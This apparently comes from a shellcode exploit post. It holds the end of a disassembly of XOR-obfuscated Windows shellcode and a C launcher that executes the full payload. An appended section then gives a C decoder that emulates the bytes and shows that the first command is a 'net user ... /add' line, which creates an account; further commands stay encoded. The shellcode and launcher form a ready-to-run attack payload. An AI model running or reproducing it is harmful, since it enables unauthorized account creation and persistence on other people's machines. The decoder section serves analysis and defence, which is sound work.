 31f:	b9 1b 08 35 2d    	mov    $0x2d35081b,%ecx
 324:	ba 58 49 79 72    	mov    $0x72794958,%edx
 329:	31 d1             	xor    %edx,%ecx
 32b:	51                	push   %ecx
 32c:	b9 74 3a 1e 21    	mov    $0x211e3a74,%ecx
 331:	ba 2d 65 52 6e    	mov    $0x6e52652d,%edx
 336:	31 d1             	xor    %edx,%ecx
 338:	51                	push   %ecx
 339:	b9 16 10 1f 17    	mov    $0x171f1016,%ecx
 33e:	ba 34 58 54 52    	mov    $0x52545834,%edx
 343:	31 d1             	xor    %edx,%ecx
 345:	51                	push   %ecx
 346:	b9 2f 27 0c 6e    	mov    $0x6e0c272f,%ecx
 34b:	ba 4e 43 68 4e    	mov    $0x4e68434e,%edx
 350:	31 d1             	xor    %edx,%ecx
 352:	51                	push   %ecx
 353:	b9 39 22 5e 50    	mov    $0x505e2239,%ecx
 358:	ba 4b 47 39 70    	mov    $0x7039474b,%edx
 35d:	31 d1             	xor    %edx,%ecx
 35f:	51                	push   %ecx
 360:	89 e0             	mov    %esp,%eax
 362:	bb 41 41 41 01    	mov    $0x1414141,%ebx
 367:	c1 eb 08          	shr    $0x8,%ebx
 36a:	c1 eb 08          	shr    $0x8,%ebx
 36d:	c1 eb 08          	shr    $0x8,%ebx
 370:	53                	push   %ebx
 371:	50                	push   %eax
 372:	bb a6 b4 02 2f    	mov    $0x2f02b4a6,%ebx
 377:	ba 33 52 64 59    	mov    $0x59645233,%edx
 37c:	31 d3             	xor    %edx,%ebx
 37e:	ff d3             	call   *%ebx
 380:	31 c0             	xor    %eax,%eax
 382:	50                	push   %eax
 383:	b8 41 41 41 65    	mov    $0x65414141,%eax
 388:	c1 e8 08          	shr    $0x8,%eax
 38b:	c1 e8 08          	shr    $0x8,%eax
 38e:	c1 e8 08          	shr    $0x8,%eax
 391:	50                	push   %eax
 392:	b9 1e 53 39 3c    	mov    $0x3c39531e,%ecx
 397:	ba 6d 32 5b 50    	mov    $0x505b326d,%edx
 39c:	31 d1             	xor    %edx,%ecx
 39e:	51                	push   %ecx
 39f:	b9 04 66 2f 32    	mov    $0x322f6604,%ecx
 3a4:	ba 61 46 4b 5b    	mov    $0x5b4b4661,%edx
 3a9:	31 d1             	xor    %edx,%ecx
 3ab:	51                	push   %ecx
 3ac:	b9 19 1e 0d 11    	mov    $0x110d1e19,%ecx
 3b1:	ba 69 73 62 75    	mov    $0x75627369,%edx
 3b6:	31 d1             	xor    %edx,%ecx
 3b8:	51                	push   %ecx
 3b9:	b9 20 41 47 36    	mov    $0x36474120,%ecx
 3be:	ba 45 35 67 59    	mov    $0x59673545,%edx
 3c3:	31 d1             	xor    %edx,%ecx
 3c5:	51                	push   %ecx
 3c6:	b9 2b 05 64 2a    	mov    $0x2a64052b,%ecx
 3cb:	ba 47 69 44 59    	mov    $0x59446947,%edx
 3d0:	31 d1             	xor    %edx,%ecx
 3d2:	51                	push   %ecx
 3d3:	b9 10 3f 4f 22    	mov    $0x224f3f10,%ecx
 3d8:	ba 62 5a 38 43    	mov    $0x43385a62,%edx
 3dd:	31 d1             	xor    %edx,%ecx
 3df:	51                	push   %ecx
 3e0:	b9 2a 6f 2a 24    	mov    $0x242a6f2a,%ecx
 3e5:	ba 42 4f 4c 4d    	mov    $0x4d4c4f42,%edx
 3ea:	31 d1             	xor    %edx,%ecx
 3ec:	51                	push   %ecx
 3ed:	b9 29 09 1e 5e    	mov    $0x5e1e0929,%ecx
 3f2:	ba 47 6c 6a 2d    	mov    $0x2d6a6c47,%edx
 3f7:	31 d1             	xor    %edx,%ecx
 3f9:	51                	push   %ecx
 3fa:	89 e0             	mov    %esp,%eax
 3fc:	bb 41 41 41 01    	mov    $0x1414141,%ebx
 401:	c1 eb 08          	shr    $0x8,%ebx
 404:	c1 eb 08          	shr    $0x8,%ebx
 407:	c1 eb 08          	shr    $0x8,%ebx
 40a:	53                	push   %ebx
 40b:	50                	push   %eax
 40c:	bb a6 b4 02 2f    	mov    $0x2f02b4a6,%ebx
 411:	ba 33 52 64 59    	mov    $0x59645233,%edx
 416:	31 d3             	xor    %edx,%ebx
 418:	ff d3             	call   *%ebx
 41a:	31 c0             	xor    %eax,%eax
 41c:	50                	push   %eax
 41d:	b8 41 41 41 6f    	mov    $0x6f414141,%eax
 422:	c1 e8 08          	shr    $0x8,%eax
 425:	c1 e8 08          	shr    $0x8,%eax
 428:	c1 e8 08          	shr    $0x8,%eax
 42b:	50                	push   %eax
 42c:	b9 72 2a 05 39    	mov    $0x39052a72,%ecx
 431:	ba 52 4b 70 4d    	mov    $0x4d704b52,%edx
 436:	31 d1             	xor    %edx,%ecx
 438:	51                	push   %ecx
 439:	b9 54 3a 05 52    	mov    $0x52053a54,%ecx
 43e:	ba 35 48 71 6f    	mov    $0x6f714835,%edx
 443:	31 d1             	xor    %edx,%ecx
 445:	51                	push   %ecx
 446:	b9 29 16 0a 47    	mov    $0x470a1629,%ecx
 44b:	ba 4c 36 79 33    	mov    $0x3379364c,%edx
 450:	31 d1             	xor    %edx,%ecx
 452:	51                	push   %ecx
 453:	b9 27 1b 5b 3e    	mov    $0x3e5b1b27,%ecx
 458:	ba 55 6d 32 5d    	mov    $0x5d326d55,%edx
 45d:	31 d1             	xor    %edx,%ecx
 45f:	51                	push   %ecx
 460:	b9 33 1a 3b 10    	mov    $0x103b1a33,%ecx
 465:	ba 41 77 48 75    	mov    $0x75487741,%edx
 46a:	31 d1             	xor    %edx,%ecx
 46c:	51                	push   %ecx
 46d:	b9 34 79 3a 12    	mov    $0x123a7934,%ecx
 472:	ba 53 59 4e 77    	mov    $0x774e5953,%edx
 477:	31 d1             	xor    %edx,%ecx
 479:	51                	push   %ecx
 47a:	b9 1d 5c 1e 28    	mov    $0x281e5c1d,%ecx
 47f:	ba 72 32 78 41    	mov    $0x41783272,%edx
 484:	31 d1             	xor    %edx,%ecx
 486:	51                	push   %ecx
 487:	b9 2a 4e 5a 28    	mov    $0x285a4e2a,%ecx
 48c:	ba 59 2d 7a 4b    	mov    $0x4b7a2d59,%edx
 491:	31 d1             	xor    %edx,%ecx
 493:	51                	push   %ecx
 494:	89 e0             	mov    %esp,%eax
 496:	bb 41 41 41 01    	mov    $0x1414141,%ebx
 49b:	c1 eb 08          	shr    $0x8,%ebx
 49e:	c1 eb 08          	shr    $0x8,%ebx
 4a1:	c1 eb 08          	shr    $0x8,%ebx
 4a4:	53                	push   %ebx
 4a5:	50                	push   %eax
 4a6:	bb a6 b4 02 2f    	mov    $0x2f02b4a6,%ebx
 4ab:	ba 33 52 64 59    	mov    $0x59645233,%edx
 4b0:	31 d3             	xor    %edx,%ebx
 4b2:	ff d3             	call   *%ebx
 4b4:	bb f9 7e 5e 22    	mov    $0x225e7ef9,%ebx
 4b9:	ba 36 54 3d 54    	mov    $0x543d5436,%edx
 4be:	31 d3             	xor    %edx,%ebx
 4c0:	ff d3             	call   *%ebx
*/

#include <stdio.h>
#include <string.h>

int main(){
unsigned char shellcode[]=
"\x31\xc0\x50\xb8\x41\x41\x41\x64\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x6d\x76\x53\x52\xba\x4d\x59\x32\x36\x31\xd1\x51\xb9\x6e\x72\x61\x71\xba\x4e\x33\x2d\x38\x31\xd1\x51\xb9\x6c\x75\x78\x78\xba\x4c\x34\x34\x31\x31\xd1\x51\xb9\x46\x47\x57\x46\xba\x33\x34\x32\x34\x31\xd1\x51\xb9\x56\x50\x47\x64\xba\x38\x35\x33\x44\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x01\x41\x60\x32\xba\x48\x61\x4f\x53\x31\xd1\x51\xb9\x28\x47\x0d\x2f\xba\x5b\x67\x4c\x63\x31\xd1\x51\xb9\x03\x24\x36\x21\xba\x62\x50\x59\x53\x31\xd1\x51\xb9\x34\x41\x15\x18\xba\x5d\x32\x61\x6a\x31\xd1\x51\xb9\x0c\x05\x1b\x25\xba\x68\x68\x72\x4b\x31\xd1\x51\xb9\x2f\x27\x7b\x13\xba\x5a\x57\x5b\x52\x31\xd1\x51\xb9\x1c\x2c\x02\x3e\xba\x70\x4b\x70\x51\x31\xd1\x51\xb9\x3d\x2a\x32\x4c\xba\x51\x45\x51\x2d\x31\xd1\x51\xb9\x23\x5c\x1c\x19\xba\x4d\x39\x68\x39\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x02\x63\x6b\x35\xba\x4b\x43\x44\x54\x31\xd1\x51\xb9\x61\x55\x6c\x3d\xba\x43\x75\x2d\x71\x31\xd1\x51\xb9\x27\x3f\x3b\x1a\xba\x54\x5a\x49\x69\x31\xd1\x51\xb9\x25\x34\x12\x67\xba\x4a\x44\x32\x32\x31\xd1\x51\xb9\x0b\x02\x1f\x19\xba\x6e\x71\x74\x6d\x31\xd1\x51\xb9\x39\x3f\x7b\x15\xba\x4d\x5a\x5b\x51\x31\xd1\x51\xb9\x35\x15\x03\x2a\xba\x67\x70\x6e\x45\x31\xd1\x51\xb9\x3a\x17\x75\x46\xba\x6f\x47\x55\x64\x31\xd1\x51\xb9\x26\x35\x0b\x1e\xba\x6a\x72\x59\x51\x31\xd1\x51\xb9\x2a\x2a\x06\x2a\xba\x66\x65\x45\x6b\x31\xd1\x51\xb9\x1d\x20\x35\x5a\xba\x53\x65\x61\x7a\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb9\x09\x4c\x7c\x5e\xba\x38\x6c\x53\x38\x31\xd1\x51\xb9\x42\x4d\x39\x14\xba\x62\x62\x5d\x34\x31\xd1\x5
1\xb9\x7a\x24\x26\x75\xba\x2d\x6b\x74\x31\x31\xd1\x51\xb9\x1d\x30\x15\x28\xba\x58\x77\x4a\x6c\x31\xd1\x51\xb9\x7c\x2f\x57\x16\xba\x53\x5b\x77\x44\x31\xd1\x51\xb9\x42\x25\x2a\x66\xba\x2d\x4b\x59\x46\x31\xd1\x51\xb9\x28\x2f\x0c\x5a\xba\x4d\x4c\x78\x33\x31\xd1\x51\xb9\x20\x2b\x26\x26\xba\x63\x44\x48\x48\x31\xd1\x51\xb9\x08\x2b\x23\x67\xba\x66\x52\x77\x34\x31\xd1\x51\xb9\x49\x1c\x2e\x48\xba\x69\x7a\x6a\x2d\x31\xd1\x51\xb9\x67\x67\x1d\x37\xba\x45\x47\x32\x41\x31\xd1\x51\xb9\x03\x33\x0d\x3b\xba\x71\x45\x68\x49\x31\xd1\x51\xb9\x39\x6a\x3c\x2f\xba\x55\x4a\x6f\x4a\x31\xd1\x51\xb9\x37\x44\x1f\x2e\xba\x5a\x2d\x71\x4f\x31\xd1\x51\xb9\x34\x23\x23\x3b\xba\x68\x77\x46\x49\x31\xd1\x51\xb9\x07\x3a\x0a\x14\xba\x73\x48\x65\x78\x31\xd1\x51\xb9\x14\x2e\x58\x53\xba\x48\x6d\x37\x3d\x31\xd1\x51\xb9\x3e\x3d\x26\x32\xba\x52\x6e\x43\x46\x31\xd1\x51\xb9\x33\x3c\x35\x34\xba\x5d\x48\x47\x5b\x31\xd1\x51\xb9\x36\x0e\x07\x2b\xba\x58\x7a\x44\x44\x31\xd1\x51\xb9\x3c\x10\x0a\x37\xba\x49\x62\x78\x52\x31\xd1\x51\xb9\x24\x7c\x3b\x36\xba\x61\x31\x67\x75\x31\xd1\x51\xb9\x31\x3d\x3b\x27\xba\x62\x64\x68\x73\x31\xd1\x51\xb9\x7f\x7d\x3d\x35\xba\x36\x33\x78\x69\x31\xd1\x51\xb9\x7c\x13\x0f\x2f\xba\x31\x52\x4c\x67\x31\xd1\x51\xb9\x1b\x08\x35\x2d\xba\x58\x49\x79\x72\x31\xd1\x51\xb9\x74\x3a\x1e\x21\xba\x2d\x65\x52\x6e\x31\xd1\x51\xb9\x16\x10\x1f\x17\xba\x34\x58\x54\x52\x31\xd1\x51\xb9\x2f\x27\x0c\x6e\xba\x4e\x43\x68\x4e\x31\xd1\x51\xb9\x39\x22\x5e\x50\xba\x4b\x47\x39\x70\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x65\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x1e\x53\x39\x3c\xba\x6d\x32\x5b\x50\x31\xd1\x51\xb9\x04\x66\x2f\x32\xba\x61\x46\x4b\x5b\x31\xd1\x51\xb9\x19\x1e\x0d\x11\xba\x69\x73\x62\x75\x31\xd1\x51\xb9\x20\x41\x47\x36\xba\x45\x35\x67\x59\x31\xd1\x51\xb9\x2b\x05\x64\x2a\xba\x47\x69\x44\x59\x31\xd1\x51\xb9\x10\x3f\x4f\x22\xba\x62\x5a\x38\x43\x31\xd1\x51\xb9\x2a\x6f\x2a\x24\xba\x42\x4
f\x4c\x4d\x31\xd1\x51\xb9\x29\x09\x1e\x5e\xba\x47\x6c\x6a\x2d\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x6f\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x72\x2a\x05\x39\xba\x52\x4b\x70\x4d\x31\xd1\x51\xb9\x54\x3a\x05\x52\xba\x35\x48\x71\x6f\x31\xd1\x51\xb9\x29\x16\x0a\x47\xba\x4c\x36\x79\x33\x31\xd1\x51\xb9\x27\x1b\x5b\x3e\xba\x55\x6d\x32\x5d\x31\xd1\x51\xb9\x33\x1a\x3b\x10\xba\x41\x77\x48\x75\x31\xd1\x51\xb9\x34\x79\x3a\x12\xba\x53\x59\x4e\x77\x31\xd1\x51\xb9\x1d\x5c\x1e\x28\xba\x72\x32\x78\x41\x31\xd1\x51\xb9\x2a\x4e\x5a\x28\xba\x59\x2d\x7a\x4b\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\xbb\xf9\x7e\x5e\x22\xba\x36\x54\x3d\x54\x31\xd3\xff\xd3"; fprintf(stdout,"Length: %d\n\n",strlen(shellcode)); (*(void(*)()) shellcode)(); }
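The listing above shows the encoder's whole trick: every dword of a command string is stored as two immediates that XOR to the real bytes and get pushed, `mov %esp,%eax` turns the pushed run into a string pointer, and the function address is hidden the same way before `call *%ebx`. The following is an added example, not part of the posted exploit, that recovers what the payload does without executing it: a small interpreter for just the opcodes this encoder emits, fed a constructed sample consisting of the first block of the posted bytes (from the opening `xor %eax,%eax` to the first `call *%ebx`). `decode_shellcode`, `call_record`, the fake stack size and the `sample_*` accessors are names chosen for this example, not names from the original post.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STACK_SIZE 4096
#define MAX_CMD    256

struct call_record {
    uint32_t target;        /* absolute address handed to call *%ebx after the XOR */
    uint32_t arg2;          /* second dword on the simulated stack at the call */
    char     cmd[MAX_CMD];  /* string the first stack dword points at, if any */
};

/* Constructed sample: the first block of the posted shellcode (from the leading
 * xor %eax,%eax up to the first call *%ebx), copied byte for byte. */
static const unsigned char sample[] =
    "\x31\xc0\x50\xb8\x41\x41\x41\x64\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50"
    "\xb9\x6d\x76\x53\x52\xba\x4d\x59\x32\x36\x31\xd1\x51"
    "\xb9\x6e\x72\x61\x71\xba\x4e\x33\x2d\x38\x31\xd1\x51"
    "\xb9\x6c\x75\x78\x78\xba\x4c\x34\x34\x31\x31\xd1\x51"
    "\xb9\x46\x47\x57\x46\xba\x33\x34\x32\x34\x31\xd1\x51"
    "\xb9\x56\x50\x47\x64\xba\x38\x35\x33\x44\x31\xd1\x51"
    "\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50"
    "\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3";

static uint32_t rd32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void wr32(unsigned char *p, uint32_t v)
{
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

/* Walks the bytes with a register file and a zeroed fake stack, handling only the
 * opcodes this encoder emits (xor, mov $imm32,%reg, push/pop, shr $8, mov %esp,%eax,
 * call *%ebx).  Each call *%ebx is recorded with its decoded target and arguments.
 * Returns the number of calls seen, or -1 on an unknown opcode or stack misuse. */
int decode_shellcode(const unsigned char *code, size_t len, struct call_record *out, int max_out)
{
    uint32_t eax = 0, ebx = 0, ecx = 0, edx = 0, sp = STACK_SIZE;
    unsigned char stack[STACK_SIZE] = {0};
    int ncalls = 0;
    size_t ip = 0;

    while (ip < len) {
        unsigned char op = code[ip];
        if (op == 0x31 && ip + 1 < len) {                              /* xor r/m32,r32 */
            if      (code[ip + 1] == 0xc0) eax = 0;                    /* xor %eax,%eax */
            else if (code[ip + 1] == 0xd1) ecx ^= edx;                 /* xor %edx,%ecx */
            else if (code[ip + 1] == 0xd3) ebx ^= edx;                 /* xor %edx,%ebx */
            else return -1;
            ip += 2;
        } else if (op >= 0xb8 && op <= 0xbb && ip + 4 < len) {         /* mov $imm32,%reg */
            uint32_t imm = rd32(code + ip + 1);
            if (op == 0xb8) eax = imm; else if (op == 0xb9) ecx = imm;
            else if (op == 0xba) edx = imm; else ebx = imm;
            ip += 5;
        } else if (op == 0x50 || op == 0x51 || op == 0x53 || (op == 0x68 && ip + 4 < len)) {
            uint32_t v = op == 0x50 ? eax : op == 0x51 ? ecx : op == 0x53 ? ebx : rd32(code + ip + 1);
            if (sp < 4) return -1;                                      /* push %reg / push $imm32 */
            sp -= 4; wr32(stack + sp, v);
            ip += (op == 0x68) ? 5 : 1;
        } else if (op == 0x58) {                                       /* pop %eax */
            if (sp > STACK_SIZE - 4) return -1;
            eax = rd32(stack + sp); sp += 4; ip += 1;
        } else if (op == 0xc1 && ip + 2 < len && code[ip + 2] == 0x08 &&
                   (code[ip + 1] == 0xe8 || code[ip + 1] == 0xeb)) {   /* shr $8,%eax|%ebx */
            if (code[ip + 1] == 0xe8) eax >>= 8; else ebx >>= 8;
            ip += 3;
        } else if (op == 0x89 && ip + 1 < len && code[ip + 1] == 0xe0) { /* mov %esp,%eax */
            eax = sp; ip += 2;
        } else if (op == 0xff && ip + 1 < len && code[ip + 1] == 0xd3) { /* call *%ebx */
            if (ncalls >= max_out) return -1;
            struct call_record *r = &out[ncalls++];
            uint32_t arg1 = (sp + 4 <= STACK_SIZE) ? rd32(stack + sp) : 0;
            size_t n = 0;
            r->target = ebx;
            r->arg2 = (sp + 8 <= STACK_SIZE) ? rd32(stack + sp + 4) : 0;
            /* arg1 is an index into the fake stack when it came from mov %esp,%eax */
            while (arg1 + n < STACK_SIZE && stack[arg1 + n] != 0 && n < MAX_CMD - 1) {
                r->cmd[n] = (char)stack[arg1 + n]; n++;
            }
            r->cmd[n] = '\0';
            ip += 2;
        } else {
            return -1;
        }
    }
    return ncalls;
}

/* Decodes the embedded sample once; the accessors expose the result. */
static struct call_record sample_calls[8];
static int sample_ncalls = -2;

static void run_sample(void)
{
    if (sample_ncalls == -2)
        sample_ncalls = decode_shellcode(sample, sizeof sample - 1, sample_calls, 8);
}
int         sample_call_count(void) { run_sample(); return sample_ncalls; }
const char *sample_command(int i)   { run_sample(); return sample_calls[i].cmd; }
uint32_t    sample_target(int i)    { run_sample(); return sample_calls[i].target; }
uint32_t    sample_arg2(int i)      { run_sample(); return sample_calls[i].arg2; }

int main(void)
{
    int n = sample_call_count();
    for (int i = 0; i < n; i++)
        printf("call *0x%08x  arg2=%u  cmd=\"%s\"\n",
               (unsigned)sample_target(i), (unsigned)sample_arg2(i), sample_command(i));
    return n < 0;
}
```

Run on the sample block this prints one call: the decoded command is a `net user ... /add` line, the first argument is the pointer to it, the second argument is 1, and the target is the fixed address 0x7666e695 (0x2f02b4a6 XOR 0x59645233 from the listing). Feeding it the full `shellcode[]` from the post works the same way, since the later blocks only add `push $imm32` / `pop %eax` to the same opcode set. Because the target is a constant rather than something resolved at run time, the decoder is also the quickest way to see why the payload cannot survive a different library build or load address.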